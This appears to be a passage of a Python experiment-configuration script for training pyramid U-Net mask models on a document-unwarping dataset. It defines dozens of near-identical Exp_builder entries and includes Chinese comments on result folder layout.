rm_moduless = [module for module in sys.modules if "step09" in module]
for rm_module in rm_moduless: del sys.modules[rm_module]
#############################################################################################################################################################################################################
'''
exp_dir 是 決定 result_dir 的 "上一層"資料夾 名字喔! exp_dir要巢狀也沒問題~
比如:exp_dir = "6_mask_unet/自己命的名字",那 result_dir 就都在:
6_mask_unet/自己命的名字/result_a
6_mask_unet/自己命的名字/result_b
6_mask_unet/自己命的名字/...
'''
use_db_obj = type8_blender_kong_doc3d_in_I_gt_MC
use_loss_obj = [G_sobel_k17_loss_info_builder.set_loss_target("UNet_Mask").copy()] ### z, y, x 順序是看 step07_b_0b_Multi_UNet 來對應的喔
#############################################################
### 為了resul_analyze畫空白的圖,建一個empty的 Exp_builder
empty = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_1__2side_1__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_1__2side_1__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="為了resul_analyze畫空白的圖,建一個empty的 Exp_builder")
#############################################################
# 1 3 6 10 15 21 28 36 45 55
# side1 OK 1
ch032_1side_1__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_1__2side_1__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_1__2side_1__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
# 1 "3" 6 10 15 21 28 36 45 55
# side2 OK 4
ch032_1side_2__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_1__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_2__2side_1__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_2__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_2__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_2__2side_2__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_2__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_2__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_2__2side_2__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_2__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_2__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_2__2side_2__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
# 1 3 "6" 10 15 21 28 36 45 55
# side3 OK 10
ch032_1side_3__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_1__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_1__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_2__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_2__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_2__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_2__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_2__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_2__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_3__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_3__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_3__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_3_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_3__3side_3_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_3_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_3__3side_3_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_3__2side_3__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3__3side_3_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_3__2side_3__3side_3_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
# 1 3 6 "10" 15 21 28 36 45 55
# side4 OK 20
ch032_1side_4__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_1__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_1__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_2__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_2__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_2__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_2__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_2__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_2__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_3__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_3__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_3__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_3_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_3__3side_3_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_3_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_3__3side_3_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_3__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3__3side_3_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_3__3side_3_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_3_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_3_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_3_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_3_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_3_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_3_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_4_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_4_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_4_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_4_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_4_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_4_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_4__2side_4__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4__3side_4_4side_4, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_4__2side_4__3side_4_4side_4.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
# 1 3 6 10 "15" 21 28 36 45 55
# side5 OK 35
ch032_1side_5__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_1__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_1__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_2__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_2__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_2__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_2__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_2__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_2__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_3__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_3__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_3__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_3_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_3__3side_3_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_3_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_3__3side_3_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_3_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_3__3side_3_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_3_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_3_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_3_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_3_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_3_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_3_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_4_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_4_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
